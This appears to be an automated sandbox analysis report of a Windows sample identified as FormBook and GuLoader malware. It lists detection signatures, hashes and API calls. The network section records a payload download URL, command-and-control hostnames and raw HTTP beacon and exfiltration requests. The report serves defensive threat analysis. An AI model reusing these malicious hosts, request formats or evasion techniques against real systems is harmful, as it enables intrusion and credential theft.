Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Analysis ID: 1431789
MD5: 4621fea50e1982e6f753efe7d1be2b35
SHA1: 46072b07bfa96583ed03149a04411cbcf04eadf9
SHA256: 6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603
Tags: exe

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: https://kraljevikonaci.rs/ Avira URL Cloud: Label: malware
Source: https://kraljevikonaci.rs/ETfFmOW246.bin Avira URL Cloud: Label: malware
Source: https://kraljevikonaci.rs/ETfFmOW246.bin5? Avira URL Cloud: Label: malware
Source: https://kraljevikonaci.rs/ETfFmOW246.binY Avira URL Cloud: Label: malware
Source: https://kraljevikonaci.rs/ETfFmOW246.bins Avira URL Cloud: Label: malware
Source: kraljevikonaci.rs Virustotal: Detection: 15%
Source: https://kraljevikonaci.rs/ETfFmOW246.bin Virustotal: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Virustotal: Detection: 60%
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Virustotal: Detection: 57%
Source: Yara match File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 195.252.110.253:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2075195434.0000000008A34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2069285687.0000000007840000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615448213.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2233571308.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Overfondle.exe, Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: cmd.pdb source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405A19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004065CE FindFirstFileA,FindClose, 0_2_004065CE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004027AA FindFirstFileA, 0_2_004027AA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003DB880 FindFirstFileW,FindNextFileW,FindClose, 14_2_003DB880
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Moviedom230\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then xor eax, eax 14_2_003C9430
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 14_2_003D1DAF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 14_2_003D1DD0
Source: Joe Sandbox View IP Address: 219.94.128.41
Source: Joe Sandbox View IP Address: 217.160.0.183
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ETfFmOW246.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: kraljevikonaci.rsCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic DNS traffic detected: DNS query: kraljevikonaci.rs
Source: global traffic DNS traffic detected: DNS query: www.ejbodyart.com
Source: global traffic DNS traffic detected: DNS query: www.jt-berger.store
Source: global traffic DNS traffic detected: DNS query: www.n-benriya002.com
Source: unknown HTTP traffic detected: POST /9pdo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 195Connection: closeCache-Control: no-cacheHost: www.jt-berger.storeOrigin: http://www.jt-berger.storeReferer: http://www.jt-berger.store/9pdo/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 Data Ascii: U06lIV=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0KwLL/BQrr4JizZvZz8IBeAv+jjw
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 17:25:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-Encoding Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:05 GMTServer: ApacheContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:08 GMTServer: ApacheContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 25 Apr 2024 17:26:11 GMTServer: ApacheContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Thu, 25 Apr 2024 17:26:14 GMTServer: Apache Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 17:26:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.n-benriya002.com
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.n-benriya002.com/9pdo/
Source: Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Overfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: Overfondle.exe, 00000008.00000003.2065621481.0000000004465000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/
Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170479484.0000000004456000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bin
Source: Overfondle.exe, 00000008.00000003.2065581113.0000000004487000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065735532.000000000447B000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bin5?
Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.binY
Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kraljevikonaci.rs/ETfFmOW246.bins
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cmd.exe, 0000000E.00000003.2349353225.0000000007982000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 195.252.110.253:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004054B6

E-Banking Fraud

Source: Yara match File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Overfondle.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_204A2C70
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_204A2DF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A35C0 NtCreateMutant,LdrInitializeThunk, 8_2_204A35C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A4340 NtSetContextThread, 8_2_204A4340
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A4650 NtSuspendThread, 8_2_204A4650
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2AD0 NtReadFile, 8_2_204A2AD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2AF0 NtWriteFile, 8_2_204A2AF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2AB0 NtWaitForSingleObject, 8_2_204A2AB0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2B60 NtClose, 8_2_204A2B60
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2BE0 NtQueryValueKey, 8_2_204A2BE0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2BF0 NtAllocateVirtualMemory, 8_2_204A2BF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2B80 NtQueryInformationFile, 8_2_204A2B80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2BA0 NtEnumerateValueKey, 8_2_204A2BA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2C60 NtCreateKey, 8_2_204A2C60
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2C00 NtQueryInformationProcess, 8_2_204A2C00
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2CC0 NtQueryVirtualMemory, 8_2_204A2CC0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2CF0 NtOpenProcess, 8_2_204A2CF0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2CA0 NtQueryInformationToken, 8_2_204A2CA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2D00 NtSetInformationFile, 8_2_204A2D00
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2D10 NtMapViewOfSection, 8_2_204A2D10
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2D30 NtUnmapViewOfSection, 8_2_204A2D30
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2DD0 NtDelayExecution, 8_2_204A2DD0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2DB0 NtEnumerateKey, 8_2_204A2DB0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2E30 NtWriteVirtualMemory, 8_2_204A2E30
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2EE0 NtQueueApcThread, 8_2_204A2EE0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2E80 NtReadVirtualMemory, 8_2_204A2E80
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A2EA0 NtAdjustPrivilegesToken, 8_2_204A2EA0
